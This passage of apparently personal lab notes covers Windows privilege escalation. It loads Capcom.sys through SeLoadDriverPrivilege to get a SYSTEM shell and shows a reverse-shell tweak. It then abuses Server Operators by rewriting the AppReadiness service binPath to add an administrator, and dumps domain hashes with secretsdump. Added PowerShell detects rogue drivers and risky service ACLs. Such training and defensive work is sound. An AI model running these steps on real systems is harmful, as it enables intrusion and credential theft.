6. Enable SeLoadDriverPrivilege

PS C:\mrci0x1> EnableSeLoadDriverPrivilege.exe
whoami:
INLANEFREIGHT0\printsvc

whoami /priv
SeMachineAccountPrivilege        Disabled
SeLoadDriverPrivilege            Enabled
SeShutdownPrivilege              Disabled
SeChangeNotifyPrivilege          Enabled by default
SeIncreaseWorkingSetPrivilege    Disabled
NTSTATUS: 00000000, WinError: 0

7. Verify SeLoadDriverPrivilege Enabled

PS C:\mrci0x1> whoami /priv
Privilege Name                Description                          State
============================= ==================================  ==========
SeMachineAccountPrivilege     Add workstations to domain           Disabled
SeLoadDriverPrivilege         Load and unload device drivers       Enabled
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled

8. Verify Capcom.sys Loaded

PS C:\mrci0x1> .\DriverView.exe /stext drivers.txt
PS C:\mrci0x1> cat drivers.txt | Select-String -pattern Capcom
Driver Name           : Capcom.sys
Filename              : C:\Tools\Capcom.sys

9. Execute ExploitCapcom

PS C:\mrci0x1> .\ExploitCapcom.exe
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000070
[*] Shellcode was placed at 0000024822A50008
[+] Shellcode was executed
[+] Token stealing was successful
[+] The SYSTEM shell was launched

Modify for Reverse Shell (optional)

TCHAR CommandLine[] = TEXT("C:\\ProgramData\\revshell.exe");

Automate with EoPLoadDriver

PS C:\mrci0x1> EoPLoadDriver.exe System\CurrentControlSet\Capcom C:\Tools\Capcom.sys
[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-454284637-3659702366-2958135535-1103\System\CurrentControlSet\Capcom
NTSTATUS: c000010e, WinError: 0

Then Execute ExploitCapcom

PS C:\mrci0x1> .\ExploitCapcom.exe
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000070
[*] Shellcode was placed at 0000024822A50008
[+] Shellcode was executed
[+] Token stealing was successful
[+] The SYSTEM shell was launched

Cleanup Registry Key

PS C:\mrci0x1> reg delete HKCU\System\CurrentControlSet\Capcom

This exploit is patched in modern Windows versions (e.g., Windows 10) via registry restrictions. Verify the target system’s vulnerability.
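Two things a defender can check after the Capcom.sys walkthrough above: which loaded kernel drivers are unsigned or live outside the system driver directories (the walkthrough loads one from `C:\Tools`), and whether any user hive contains a service-style key under `System\CurrentControlSet` (the walkthrough registers the driver under HKCU so that `NtLoadDriver` will accept the path). The following is an added example, not part of the original notes; it runs locally with built-in cmdlets only and the path normalisation rules are my own.

```powershell
# Added example (not from the original notes): local checks for driver loading
# abuse via SeLoadDriverPrivilege.

function Get-SuspiciousDrivers {
    # Running drivers that are unsigned, have no file on disk, or live outside
    # System32\drivers and the DriverStore.
    $driverDir   = Join-Path $env:SystemRoot 'System32\drivers'
    $driverStore = Join-Path $env:SystemRoot 'System32\DriverStore'

    Get-CimInstance Win32_SystemDriver | Where-Object { $_.State -eq 'Running' } | ForEach-Object {
        # PathName may be an NT path (\??\C:\... or \SystemRoot\...) or relative
        # to the Windows directory; normalise to a Win32 path first.
        $path = [string]$_.PathName
        $path = $path -replace '^\\\?\?\\', '' -replace '^\\SystemRoot\\', "$env:SystemRoot\"
        if ($path -and -not [System.IO.Path]::IsPathRooted($path)) { $path = Join-Path $env:SystemRoot $path }

        $sig = if ($path -and (Test-Path -LiteralPath $path)) {
            (Get-AuthenticodeSignature -LiteralPath $path).Status.ToString()
        } else { 'FileMissing' }
        $inSystemDir = ($path -like "$driverDir\*") -or ($path -like "$driverStore\*")

        if (-not $inSystemDir -or $sig -ne 'Valid') {
            [pscustomobject]@{ Driver = $_.Name; Path = $path; Signature = $sig; InSystemDir = $inSystemDir }
        }
    }
}

function Get-UserHiveDriverServices {
    # Service definitions (keys with an ImagePath) under any loaded user hive.
    # HKLM\System\CurrentControlSet is where real services live; a copy of that
    # layout under HKEY_USERS\<sid> exists only if someone created it.
    foreach ($hive in Get-ChildItem Registry::HKEY_USERS -ErrorAction SilentlyContinue) {
        $ccs = "Registry::HKEY_USERS\$($hive.PSChildName)\System\CurrentControlSet"
        if (-not (Test-Path -LiteralPath $ccs)) { continue }
        foreach ($svc in Get-ChildItem -LiteralPath $ccs -ErrorAction SilentlyContinue) {
            $p = Get-ItemProperty -LiteralPath $svc.PSPath
            if ($p.ImagePath) {
                [pscustomobject]@{
                    UserSid   = $hive.PSChildName
                    Key       = $svc.PSChildName
                    ImagePath = $p.ImagePath
                    Type      = $p.Type
                }
            }
        }
    }
}

Get-SuspiciousDrivers       | Format-Table -AutoSize
Get-UserHiveDriverServices  | Format-Table -AutoSize
```

Read the first report with some care: third-party drivers installed to vendor directories will appear with `InSystemDir = False` while still being validly signed, so the combination of an unusual path and a signature status other than `Valid` is the interesting case. The second report should normally be empty; any row is a driver registration in a user hive, which no installer does. Beyond the registry restriction the note above mentions, the structural fix is removing SeLoadDriverPrivilege from Print Operators (User Rights Assignment) and keeping that group empty, since the privilege itself is the problem rather than any particular driver.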

Server Operators Group

The AppReadiness service runs as LocalSystem, a highly privileged account.

Query AppReadiness Service

C:\mrci0x1> sc qc AppReadiness
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: AppReadiness
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Windows\System32\svchost.exe -k AppReadiness -p
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : App Readiness
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

Check Service Permissions

C:\mrci0x1> c:\Tools\PsService.exe security AppReadiness
PsService v2.25 - Service information and configuration utility
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com

SERVICE_NAME: AppReadiness
DISPLAY_NAME: App Readiness
        ACCOUNT: LocalSystem
        SECURITY:
        [ALLOW] NT AUTHORITY\SYSTEM
                Query status
                Query Config
                Interrogate
                Enumerate Dependents
                Pause/Resume
                Start
                Stop
                User-Defined Control
                Read Permissions
        [ALLOW] BUILTIN\Administrators
                All
        [ALLOW] NT AUTHORITY\INTERACTIVE
                Query status
                Query Config
                Interrogate
                Enumerate Dependents
                User-Defined Control
                Read Permissions
        [ALLOW] NT AUTHORITY\SERVICE
                Query status
                Query Config
                Interrogate
                Enumerate Dependents
                User-Defined Control
                Read Permissions
        [ALLOW] BUILTIN\Server Operators
                All

Verify Local Administrators Group Membership

C:\mrci0x1> net localgroup Administrators
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
Domain Admins
Enterprise Admins
The command completed successfully.

Modify Service Binary Path

C:\mrci0x1> sc config AppReadiness binPath= "cmd /c net localgroup Administrators server_adm /add"
[SC] ChangeServiceConfig SUCCESS

Start the Service (Trigger Payload)

C:\mrci0x1> sc start AppReadiness
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

Verify Updated Administrators Group Membership

C:\mrci0x1> net localgroup Administrators
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
Domain Admins
Enterprise Admins
server_adm
The command completed successfully.

Verify Admin Access with crackmapexec

mrci0x1@htb$ crackmapexec smb 10.129.43.9 -u server_adm -p 'HTB_@cademy_stdnt!'
SMB         10.129.43.9     445    WINLPE-DC01      [*] Windows 10.0 Build 17763 (name:WINLPE-DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB         10.129.43.9     445    WINLPE-DC01      [+] INLANEFREIGHT.LOCAL\server_adm:HTB_@cademy_stdnt! (Pwn3d!)

Dump Administrator NTLM Hash with secretsdump

mrci0x1@htb$ secretsdump.py server_adm@10.129.43.9 -just-dc-user administrator
Impacket v0.9.22.dev1+20200929.152157.fe642b24 - Copyright 2020 SecureAuth Corporation

Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:5db9c9ada113804443a8aeb64f500cd3e9670348719ce1436bcc95d1d93dad43
Administrator:aes128-cts-hmac-sha1-96:94c300d0e47775b407f2496a5cca1a0a
Administrator:des-cbc-md5:d60dfbbf20548938
[*] Cleaning up...
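Both the DNS service descriptor in the DnsAdmins section (`sc.exe sdshow DNS`) and the AppReadiness permissions shown by PsService above are service ACLs, and the question a defender needs answered is the same for each: which principals other than SYSTEM and Administrators can reconfigure, start, stop or re-ACL the service. The following is an added example, not part of the original notes: a PowerShell decoder for service SDDL that maps each ACE to the service-specific access rights and flags the risky ones. The DNS SDDL is the one recorded in these notes; the AppReadiness SDDL is constructed by me to reproduce the PsService output above, since the notes show the decoded permissions rather than the raw descriptor. `Get-ServiceSddl` fetches a live descriptor with `sc.exe sdshow`.

```powershell
# Added example (not from the original notes): decode a service security
# descriptor and flag risky rights held by non-administrative principals.

# Service-specific access mask bits from winsvc.h plus the standard rights.
# SDDL letters map as: CC=QueryConfig DC=ChangeConfig LC=QueryStatus
# SW=EnumerateDependents RP=Start WP=Stop DT=PauseContinue LO=Interrogate
# CR=UserDefinedControl SD=Delete RC=ReadControl WD=WriteDac WO=WriteOwner GA=All
$ServiceRights = [ordered]@{
    QueryConfig = 0x0001; ChangeConfig = 0x0002; QueryStatus = 0x0004; EnumerateDependents = 0x0008
    Start = 0x0010; Stop = 0x0020; PauseContinue = 0x0040; Interrogate = 0x0080; UserDefinedControl = 0x0100
    Delete = 0x10000; ReadControl = 0x20000; WriteDac = 0x40000; WriteOwner = 0x80000
}
$GenericAll  = 0x10000000
# Rights that let a principal change what the service runs or who controls it.
$Dangerous   = 'ChangeConfig', 'Start', 'Stop', 'Delete', 'WriteDac', 'WriteOwner', 'All'
$TrustedSids = 'S-1-5-18', 'S-1-5-32-544'    # SYSTEM, BUILTIN\Administrators

function ConvertTo-RightsList([int]$Mask) {
    if ($Mask -band $GenericAll) { return @('All') }
    $ServiceRights.GetEnumerator() | Where-Object { $Mask -band $_.Value } | ForEach-Object { $_.Key }
}

function Get-ServiceAceReport {
    param([Parameter(Mandatory)][string]$Sddl, [string]$ServiceName = '')
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($Sddl)
    foreach ($ace in $sd.DiscretionaryAcl) {
        if ($ace.AceType -ne 'AccessAllowed') { continue }
        $rights = @(ConvertTo-RightsList $ace.AccessMask)
        $sid    = $ace.SecurityIdentifier
        try   { $name = $sid.Translate([System.Security.Principal.NTAccount]).Value }
        catch { $name = $sid.Value }   # domain SIDs do not resolve off-domain
        $risky  = @($rights | Where-Object { $_ -in $Dangerous })
        $flag   = ''
        if ($risky.Count -gt 0 -and ($sid.Value -notin $TrustedSids)) { $flag = 'REVIEW: ' + ($risky -join ',') }
        [pscustomobject]@{
            Service = $ServiceName; Principal = $name; Sid = $sid.Value
            Rights  = ($rights -join ','); Flag = $flag
        }
    }
}

function Get-ServiceSddl([string]$Name) {
    # sc.exe sdshow prints a blank line followed by the SDDL string.
    (sc.exe sdshow $Name | Where-Object { $_ -match '^[DOGS]:' }) -join ''
}

# 1. DNS service descriptor recorded in the DnsAdmins section: the trailing
#    domain SID (netadm) holds RP+WP, i.e. Start and Stop.
$DnsSddl = 'D:(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)' +
           '(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SO)' +
           '(A;;RPWP;;;S-1-5-21-669053619-2741956077-1013132368-1109)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)'
# 2. Constructed AppReadiness descriptor reproducing the PsService output above
#    (Administrators: All, Server Operators: All, read-only for the rest).
$AppReadinessSddl = 'D:(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;GA;;;BA)(A;;GA;;;SO)'

Get-ServiceAceReport -Sddl $DnsSddl          -ServiceName DNS
Get-ServiceAceReport -Sddl $AppReadinessSddl -ServiceName AppReadiness | Format-Table -AutoSize
# Live:  Get-ServiceAceReport -Sddl (Get-ServiceSddl AppReadiness) -ServiceName AppReadiness
```

Run against the two descriptors, the report flags Server Operators on both services (ChangeConfig, Stop, Start and WriteDac on DNS; All on AppReadiness) and netadm's Start/Stop on DNS. That is exactly the combination each attack above depends on: the right to point a SYSTEM service at a new binary or DLL, plus the right to restart it. Iterating `Get-ServiceSddl` over `Get-Service | Select-Object -ExpandProperty Name` turns this into a host-wide review, and the same decoder works on the `sc.exe sdshow` output for the Mozilla Maintenance Service discussed under Hyper-V Administrators.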
